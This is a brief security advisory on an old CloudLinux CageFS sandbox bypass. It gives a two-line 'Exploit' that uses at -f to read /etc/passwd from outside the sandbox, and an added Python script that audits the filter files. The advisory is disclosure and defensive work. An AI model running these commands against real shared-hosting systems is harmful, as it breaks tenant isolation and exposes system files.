Vulnerability
Affected software: CloudLinux CageFS, unknown version (old vulnerability from around 2016, I no longer have the original report)
CloudLinux CageFS can be bypassed by running at with the -f parameter pointing to a file to read and then displaying the job contents. The -f argument of at is not filtered by proxyexec before at is executed outside CageFS, allowing a user inside CageFS to read files outside CageFS.
Exploit
$ at -f /etc/passwd 00:00
$ at -c JOB_NUMBER
Solution
Update CageFS to an unaffected version. Check if the -f parameter is filtered in /etc/cagefs/filters/at*.json.
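One way to script the filter check, as an added example that is not part of the original advisory or CloudLinux's own tooling. It assumes each filter file is a JSON object keyed by command path or "default", with "deny", "allow" and "restrict_path" option lists; compare that assumption with the files on your system, and note that the sample data is constructed.

```python
import glob
import json

# Constructed sample filter files (not real CageFS output). The schema is an
# assumption: command path or "default" -> {"deny"/"allow"/"restrict_path": [...]}.
SAMPLE = {
    "at-open.json": {"/usr/bin/at": {"deny": [], "restrict_path": []}},
    "at-fixed.json": {"/usr/bin/at": {"restrict_path": ["-f"]}},
    "at-deny.json": {"default": {"deny": ["-f"]}},
}

def option_status(entry, opt="-f"):
    """Classify how one filter entry treats opt."""
    if not isinstance(entry, dict):
        return "unknown"  # unexpected shape: review by hand
    if opt in (entry.get("deny") or []):
        return "denied"
    if opt in (entry.get("restrict_path") or []):
        return "path-restricted"
    if "allow" in entry and opt not in (entry["allow"] or []):
        return "denied"  # allow list present and opt is not on it
    return "unfiltered"

def audit_filters(docs, opt="-f"):
    """docs maps file name -> parsed JSON; returns {(file, key): status}."""
    results = {}
    for name, doc in docs.items():
        if not isinstance(doc, dict) or not doc:
            results[(name, None)] = "unknown"
            continue
        for key, entry in doc.items():
            results[(name, key)] = option_status(entry, opt)
    return results

def load_filters(pattern="/etc/cagefs/filters/at*.json"):
    """Parse every filter file matching the path named in the advisory."""
    docs = {}
    for path in sorted(glob.glob(pattern)):
        with open(path) as fh:
            docs[path] = json.load(fh)
    return docs

if __name__ == "__main__":
    docs = load_filters()
    if not docs:
        print("no at*.json filter files found; auditing constructed samples")
        docs = SAMPLE
    for (name, key), status in audit_filters(docs).items():
        print(f"{name} [{key}]: -f is {status}")
```

Any entry reported as "unfiltered" or "unknown", or the absence of any at*.json file, is worth reviewing by hand.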
Timeline
Unknown (old vulnerability from around 2016, I no longer have the original report, it was fixed around 2016).